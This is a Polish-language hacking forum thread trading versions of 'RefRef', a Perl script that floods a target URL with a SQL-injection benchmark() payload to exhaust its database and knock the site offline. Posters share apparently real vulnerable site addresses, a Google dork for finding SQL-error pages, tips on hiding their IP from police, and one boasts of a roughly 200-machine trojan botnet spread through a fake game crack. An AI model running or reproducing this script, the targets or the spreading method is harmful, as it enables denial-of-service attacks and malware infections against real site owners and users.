RefRef 1.3.1 DoS

[pro+moc=ja]

Jaki error? Może nie zauważyłeś, ale nie da się otwierać zdjęć wrzuconych w sposób, w który ty to zrobiłeś. Wrzuć na imgur.com

http://img857.imageshack.us/img857/6670/4rtyz.jpg

#!usr/bin/perl
#RefRef 1.2.0 (C) VR Eight & Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();

sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print " OWNED\n";
}
copyright();
} else {
print " ERROR\n";
copyright();
}}

sub head {
print "\n\n------------------------------\n";
}

sub copyright {
print "\n------------------------------\n\n";
exit(1);
}

sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}

sub toma {
return $nave->get($_[0]);
}

 

[sich]

up mam error
http://img40.imageshack.us/img40/7633/screenhunter04jan080316.jpg

 

[VR8]

Nie wiem czemu ale na "nowszych" stronach skrypt szwankuje. Trzymaj starszą wersję:

#!usr/bin/perl
#RefRef 1.2.0 (C) VR Eight & Anonymous 2011

use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();
 
sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print " OWNED\n";
}
copyright();
} else { 
print " ERROR\n";
copyright();
}}
 
sub head {
print "\n\n------------------------------\n";
}
 
sub copyright {
print "\n------------------------------\n\n";
exit(1);
}
 
sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}
 
sub toma {
return $nave->get($_[0]);
}

Dlatego zrobiliśmy odrazu wersję 1.3.0~1 ... Zaraz to poprawie.

#!usr/bin/perl
#RefRef 1.1.2 (C) VR Eight & Anonymous 2011

use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();
 
sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print " OWNED\n";
}
copyright();
}}
 
sub head {
print "\n\n------------------------------\n";
}
 
sub copyright {
print "\n------------------------------\n\n";
exit(1);
}
 
sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}
 
sub toma {
return $nave->get($_[0]);
}

 

[michal31337]

http://img857.imageshack.us/img857/6670/4rtyz.jpg

Masz Perla, prawda?

PS. http://ykzzb.gov.cn/ nie ma już błędów SQL injection. Naprawili.

 

[aksumen212]

Spróbowałem i ja. Pierwszy skrypt nie działa, tzn. jest problem z autoryzacją http://imageshack.us/photo/my-images/851/dos1.png/. Drugi działa, wyskakuje wam błąd http://imageshack.us/photo/my-images/401/dos2.png/, ponieważ strona nie jest już podatna na ataki. Może ktoś mi podać strony z błędami SQL? Chodzi mi o strony zwykłe, nie rządowe.

 

[VR8]

Spróbowałem i ja. Pierwszy skrypt nie działa, tzn. jest problem z autoryzacją http://imageshack.us/photo/my-images/851/dos1.png/. Drugi działa, wyskakuje wam błąd http://imageshack.us/photo/my-images/401/dos2.png/, ponieważ strona nie jest już podatna na ataki. Może ktoś mi podać strony z błędami SQL? Chodzi mi o strony zwykłe, nie rządowe.

DRUGI NIE DZIAŁA! Widzisz, jest syntax error w linii 27.
Ten działa:

#!usr/bin/perl
#RefRef 1.1.2 (C) VR Eight & Anonymous 2011

use LWP::UserAgent;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
syntax();
}
copyright();
 
sub now {
print "\n TARGET : ".$_[0]."\n\n";
print " EXPLOITATION...\n";
while(true) {
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print " OWNED\n";
}
copyright();
}}
 
sub head {
print "\n\n------------------------------\n";
}
 
sub copyright {
print "\n------------------------------\n\n";
exit(1);
}
 
sub syntax {
print "\n SYNTAX: $0 \n";
copyright();
}
 
sub toma {
return $nave->get($_[0]);
}

 

[aksumen212]

DRUGI NIE DZIAŁA! Widzisz, jest syntax error w linii 27.

Wydawało mi się, że działa. Nie znam się za bardzo na języku perl.

Ciągle mi pisze "EXPLOITATION...", tyle już stron sprawdziłem z błędami SQL ;/

 

[sich]

no mi tez http://img407.imageshack.us/img407/4058/screenhunter04jan081425.jpg

daj ktos działajacy Ref

 

[VR8]

no mi tez http://img407.imageshack.us/img407/4058/screenhunter04jan081425.jpg

daj ktos działajacy Ref

Ehe...

------------------------------

 TARGET : http://mojastrona.pl/

 EXPLOITATION...
 OWNED

------------------------------

PS.
Tam nie ma błędu SQL

Umiecie w ogóle sprawdzać podatność na SQL?
Bo jak na razie żaden z adresów który mi podałeś nie miał błędu SQL.

Jeżeli jest błąd to po dodaniu ";" do końcu adresu powinien wyskoczyć błąd linii z MYSQL_NUM_ROWS.

Edit:

Google Dork: intext:"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in"

 

[trojanxem]

http://czerwiensk.com.pl/Cantilena/news.php?id=185
Jestes pewny co tutaj do SQLi?

 

[VR8]

http://czerwiensk.com.pl/Cantilena/news.php?id=185
Jestes pewny co tutaj do SQLi?

Większość z tych hAxIoOrSóW co jadą na gotowych skryptach nie ma pojęcia jak wygląda SQLi

np.
http://www.ipis.pl/artykul.php?idartykul=34106&poddzial=StartUps

Dwie próby i mamy błąd:

http://www.ipis.pl/artykul.php?idartykul=34106'&poddzial=StartUps

PS.

Zanim zaatakujecie nawet byle jaka strony trzeba ukryć IP, bo jak admin pójdzie na psy to będzie nie miło.

 

[trojanxem]

A znajac zycie, admin stronki policzy za straty duzo wiecej niz trzeba, radze uwazac

 

[aksumen212]

Dziękuje VR8 za pomoc. Ja po prostu nie umiałem znaleźć strony podatnej na SQLi.

PS. nie jestem "hAxIoOr"

 

[sich]

a mi sie udała pisało juz web off ale dalej strona działala :/

 

[VR8]

a mi sie udała pisało juz web off ale dalej strona działala :/

Jak widać na pierwszy rzut oka, w pierwszej wersji RefRef nie ma "else print error".
I jak pisałem, jeżeli nie chcesz rozmawiac z rodzina przez szybke, zadbaj o ukrycie IP.

 

[sich]

miałem juz około 200 pc zombie ale server utrzymujacy je wygasł :/ bo mam zmienne ip dlatego musiałem załatwic stałe ip sobie wiec wybrałem no-ip host
mogłem nawet otworzyć im szuflade cd/dvd

 

[michal31337]

miałem juz około 200 pc zombie ale server utrzymujacy je wygasł :/ bo mam zmienne ip dlatego musiałem załatwic stałe ip sobie wiec wybrałem no-ip host
mogłem nawet otworzyć im szuflade cd/dvd

200 to całkiem dużo jak na trojana. A jakimi metodami rozprzestrzeniałeś zainfekowany plik?

 

[sich]

zrobiłem instalke z crackiem do multiplayera znanej gry MW2 i instalke do gry z PS2 na PC przeważnie miałem ludzi z zagranicy najwiecej USA 20% afroamerykanów z tego co widziałem po fotach na FB

 

[sich]

To coś może być dobre? -> http://hotspotshield.com/ czy CyberGhost używać? do ukrycia ip.
PS. Te forum jest do dupy!
Jedyny działający skrypt

#!usr/bin/perl
#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?

 

[weeman95]

A mam takie pytanie czy jesli podam adres im mojego kumpla na jego komputer ten atak też zadziala ?